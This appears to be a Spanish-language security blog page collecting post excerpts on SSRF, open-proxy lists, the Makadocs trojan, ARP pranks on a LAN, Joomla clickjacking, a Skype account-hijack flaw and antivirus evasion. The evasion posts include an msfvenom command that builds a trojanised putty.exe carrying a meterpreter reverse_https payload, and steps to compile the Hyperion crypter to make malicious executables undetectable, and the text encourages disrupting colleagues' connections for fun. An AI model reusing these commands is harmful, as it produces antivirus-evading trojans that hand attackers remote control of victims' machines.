La idea de un ataque SSRF (Server Side Request Forgery, no confundir con CSRF) es encontrar algún tipo de servicio vulnerable en el sistema A, que puede reenviar peticiones maliciosas a la red interna y por lo tanto al sistema B. Así es como podemos superar los firewalls y sistemas IDS y explotar sistemas más seguros. Con una vulnerabilidad de este tipo podemos por ejemplo conseguir el escaneo de redes internas, el reenvío de peticiones HTTP, ataques de fuerza bruta contra el backend y, una de las más peligrosas, hacer tunneling XXE (Xml eXternal Entity).

Hace tiempo vimos en el blog un 0-day para una vulnerabilidad XXE en Postgresql de Onsec. Esta vez, vamos a ver la presentación de una ponencia que hicieron sus integrantes, Vladimir Vorontsov y Alexander Golovko, en la conferencia ZeroNights que tuvo lugar en Moscú los pasados 19 y 20 de noviembre, y en la que veréis la aplicación práctica de varios ataques SSRF usando sockets.

Script en Perl para mantener listas de proxies abiertos

Los proxies abiertos (y encadenados) pueden ser útiles para manterner el anonimato en Internet, casi siempre no con muy "buenos" propósitos ;)
¿Cómo encontrar proxies abiertos? Es fácil si sabes cómo... No en serio, ya sabéis que hay un montón de listas disponibles en Internet. Por ejemplo, diariamente se publican listas en pastebin.com. Otros sitios están dedicados al negocio de la recopilación de enormes listas como www.freeproxylists.com o www.xroxy.com e incluso este último proporciona actualizaciones vía RSS (XML). Por supuesto, la mayoría de ellos proponen pagar por sus servicios...

La cuestión aquí es la fiabilidad de los proxies abiertos publicados. xroxy facilita un indicador de fiabilidad (0-100%), pero muchas veces los proxies no están disponibles o rechazan las conexiones.

Xavier Mertens ha publicado un pequeño script en Perl para mantener una lista de proxies abiertos fucnionales. El script se llama oplb (Open Proxies List Builder) y se basa en el agregador PHP de RSS de xroxy.com. Los proxies se almacenan en una base de datos SQLite y el script mediante un cron chequea regularmente su disponibidad mediante el módulo perl WWW:ProxyChecker. Si no quieres obtener nuevos proxies publicados por xroxy.com también tienes un modo manual para generar y mantener tu propia lista:

Troyano utiliza Google Docs para comunicarse con su C&C

Los investigadores de Symantec han descubierto una pieza de malware que se aprovecha de Google Docs para comunicarse con su servidor de comando y control (C&C).

El malware es una versión del troyano Makadocs, que abre una puerta trasera en el ordenador infectado y trata de robar información. En su última versión, este malware utiliza Google Docs como un servidor proxy para conectarse a su C&C.

"Google Docs tiene una función llamada viewer que obtiene los elementos de otra URL y los muestra", escribió en su blog Takashi Katsuki de Symantec. "Básicamente, esta funcionalidad permite al usuario ver una variedad de tipos de archivos en el navegador. Violando las políticas de Google, Backdoor.Makadocs utiliza esta función para acceder a su servidor de C&C".

"Es posible que el autor del malware haya implementado esta funcionalidad en un intento de evitar ser descubierto mediante una conexión directa con el C&C", continuó el investigador. "La conexión con el servidor de Google Docs se cifra usando HTTPS, lo que hace difícil que sea bloqueada localmente. Google podría evitar esta conexión mediante el uso de un firewall."

Recordemos que no es la primera vez que utilizan métodos no tradicionales de comunicación con servidores C&C. Otros artefactos de malware han utilizado Twitter y Facebook para recibir instrucciones...

Haciendo el gamberro en intranet & hacking con dos piedras (1ª parte)

A quién no le ha pasado que, cuando te faltan 5 minutos para descargar ese archivo que parece infinito, se conecta alguien en tu red y te ralentiza la descarga bastante. O estar trabajando con tu compañero y que se te ocurra de repente que sería gracioso entretenerte un poquito "magreándole" sus conexiones. 

Dicen que cuando el diablo se aburre mueve la cola. Y ¿por qué no? si Dios les dió aletas
a los peces sería para nadar...

La verdad que es algo cruel pero muy gracioso ver hasta que punto se desespera el teleco de al lado y te pregunta muy insistentemente "PERO A TI TE VA LA CONEXION?", o ver a tu compañero de laboratorio de informática, ese que aprovecha para chatear con su novia, soltar improperios...


La verdad es que esta entrada tiene un carácter lúdico aunque ayuda a repasar algunos consejos. Como todo, la informática también tiene su lado cómico ;D, todo no va a ser trabajar y trabajar... La gente que tenga este episodio superado (que será mucha) puede quedarse o irse, no le pondremos falta...:D 


En el primer ejemplo, del cual confieso haber echado mano más de una vez y no sólo para divertirme, interviene el protocolo ARP. Para quien no conozca el protocolo Address Resolution Protocol, haré un ínfimo resumen, pues tenemos que tener al menos una vaga idea de cómo funciona ARP si queremos saber a qué estamos jugando.


Cuando una máquina quiere enviar un paquete a otra, lo que hace es simplemente lanzar una pregunta. Para ello se envía un paquete (ARP request) a la dirección de difusión de la red (broadcast (MAC = FF FF FF FF FF FF)) del estilo: "¿Quién tiene esta dirección IP?"


Evasión de antivirus con ejecutables firmados

Continuamos con el estudio de distintas técnicas para la evasión de antivirus. En esta ocasión veremos un caso muy curioso en el que comprobaremos como la simple firma digital de un fichero ejecutable malicioso puede provocar su indetección.

¿Cómo? Pues las políticas de algunos motores de antivirus pueden excluir el análisis de un fichero simplemente por estar firmado para mejorar el rendimiento... si bien es más probable que, al añadir código al fichero durante este proceso, se vean afectadas las (frágiles) detecciones mediante firmas. Veamos los resultados.

Primero y según la Wikipedia, empezamos definiendo la firma de código como "el proceso de firmar digitalmente ejecutables y scripts para confirmar el autor del software y garantizar que el código no ha sido alterado o corrompido desde que fue firmado mediante el uso de un hash criptográfico.".

Las principales herramientas para firmar ejecutables son codesign en Mac OS X y singtool de Mozilla y Microsoft, aunque en esta entrada comenzaremos con Linux probando osslsigncode (OpenSSL-based signcode utility project), una herramienta multiplataforma basada en OpenSSL y libcurl capaz de firmar ficheros EXE/CAB y mediante la cual firmaremos nuestro fichero de pruebas: un ejecutable de Windows al que inyectaremos un payload malicioso con msfvenom:

msfvenom -p windows/meterpreter/reverse_https -f exe -k -x putty.exe LHOST=192.168.249.128 LPORT=443 >evilputty.exe

Crackea redes wifi con tu Android (en modo monitor)

Seguramente a muchos les pasó por la cabeza la idea de crackear redes wifi con su smartphone pero, para nuestra mala suerte, no se podía porque sorprendentemente el modo monitor (modo para esnifar el tráfico Wifi) no se puede encontrar en cualquier dispositivo android (por no decir en todos), ya que el chipset que se utiliza en los dispositivos android (que mayormente son realizadas por Broadcom) no añade el soporte para el modo monitor.

Pero un grupo de investigadores decidieron pasar sus vacaciones viendo la forma de añadir el modo monitor a sus Android (Nexus One y Galaxy S II). En un primer momento compilaron el controlador en modo depuración y se dieron cuenta que el modulo elimina los encabezados 801.11 en Hw, con la cual concluyeron que se necesita hacer un cambio de firmware en sus dispositivos android, así que empezaron a hacerle ingeniería inversa al firmware y después de unas semanas obtuvieron una compresión decente de la recepción de paquetes en el proceso, con lo cual sacaron su primer firmware con el modo monitor añadido.

Salto de restricciones con "clickjacking" en Joomla!

Ajay Singh Negi ha descubierto un problema de seguridad en Joomla! que podría permitir a un atacante eludir restricciones de seguridad y ataques de cross-site request forgery (CSRF) a través de la técnica del "clickjacking".

¿Qué es el Clickjacking? 
El término clickjacking fue acuñado por Jeremiah Grossman y Robert Hansen en 2008 (ya hablamos de el aquí en Hackplayers). También conocido como UI redressing, se resume en lo siguiente: un usuario hace clic sobre un enlace o botón que está viendo y en realidad lo hace sobre otro enlace controlado por terceros. El clickjacking puede ser entendido como una variante del problema de reemplazo confuso
y para referirse a cualquier tipo de técnica que implique el que un usuario interaccione con una web creyendo que en realidad lo está haciendo con otra.
 
CSRF es una técnica que permitiría realizar peticiones HTTP sin una correcta validación. Por ejemplo, imaginemos que un usuario se encuentra validado en una página que necesita autenticación. Desde el navegador, visita otra web que esconde una petición HTTP hacia esa página que necesita validación. Esa petición HTTP, en forma de enlace, se carga por la víctima sin saberlo y realiza una acción sobre la página en la que se encuentra autenticada. Esto sería un fallo de CSRF por parte de la página que necesita autenticación  puesto que no valida correctamente que las peticiones provengan de su propio dominio. Para impedir ésto, las páginas suelen introducir un sistema de control que impide que una petición desde otra web sea válida. A su vez, para eludirlo, los atacantes utilizan técnicas como clickjacking (un término acuñado en 2008), que permite realizar ataques CSRF aunque se hayan implementado ciertas técnicas para evitarlo.

El problema es que Joomlapermite a cualquier usuario realizar acciones a través de peticiones HTTP que no son convenientemente validadas. Si un usuario visita un enlace especialmente manipulado hacia una plataforma Joomla!, se podrían realizar acciones sobre el portal y el atacante podría así eludir restricciones de seguridad. No se han dado más detalles sobre la vulnerabilidad, pero probablemente permitiría que un usuario suplantase a otro sin necesidad de conocer la contraseña.

Grave fallo de seguridad en Skype permitía el secuestro de cuentas

De vez en cuando lees acerca de una vulnerabilidad y te quedas acojonado acongojado. Un sudor frío recorre tu espalda y te sientes un poquito más inseguro. Hablamos de una vulnerabilidad que afectaba al servicio de VoIP de M$, es decir, al archiutilizado Skype. 

Se trataba de un fallo muy tonto que a la postre se ha convertido en una de las brechas de seguridad más grandes conocidas hasta ahora en Skype. Concretamente cualquiera, sin necesidad de grandes conocimientos, podía acceder a una cuenta de Skype de otro usuario tan solo conociendo su dirección de correo electrónico y cambiando la contraseña. 

El procedimiento para conseguirlo se publicó hace dos meses en el foro ruso Xeksec y puede completarse en unos sencillos pasos, eso sí, lo dejamos como PoC porque actualmente y para impedir el secuestro de más cuentas se ha desactivado temporalmente el restablecimiento de contraseña:

Metasploit + Hyperion (PE Crypter) para la indetección de ejecutables maliciosos

Todos sabemos lo fácil que es inyectar un payload en un ejecutable mediante msfvenom (msfpayload + msfencoder)... y también lo fácil que es que el fichero resultante sea detectado por multitud de antivirus.

Utilizar un encoder de Metasploit no es la solución y, de hecho, a veces es mejor no usarlos o es indiferente. Nos encontramos entonces que tenemos que luchar contra la detección de firmas, la heurística y los sandboxes de los antivirus. No hay una técnica única, ni una mejor que otra, simplemente cualquiera es buena si conseguimos un bajo ratio de detección o un binario FUD.

El otro día revisamos la técnica de Assembly Ghost Writing y hoy vamos a ver el funcionamiento de un PE crypter bastante reciente denominado Hyperion.
Este crypter desarrollado por NullSecurity actua como un packer pero, en lugar de ofuscar el payload (scrambling) y encapsularlo con las instrucciones necesarias para desofuscarlo, Hyperion cifra el payload y lo encapsula con una clave AES débil la cual simplemente se rompe por fuerza bruta en tiempo de ejecución. ¿Ingenioso verdad?, vamos a ver su instalación, funcionamiento y resultado en una distribución BackTrack:

1. Descarga e instalación del crypter:

root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
crypter.exe  Examples  Fasm  FasmAES-1.0  license.txt  Makefile  Obj  readme.txt  Src
root@bt:~/Hyperion-1.0# ls -las *.exe
568 -rwxr-xr-x 1 root root 580396 2012-11-14 06:29 crypter.exe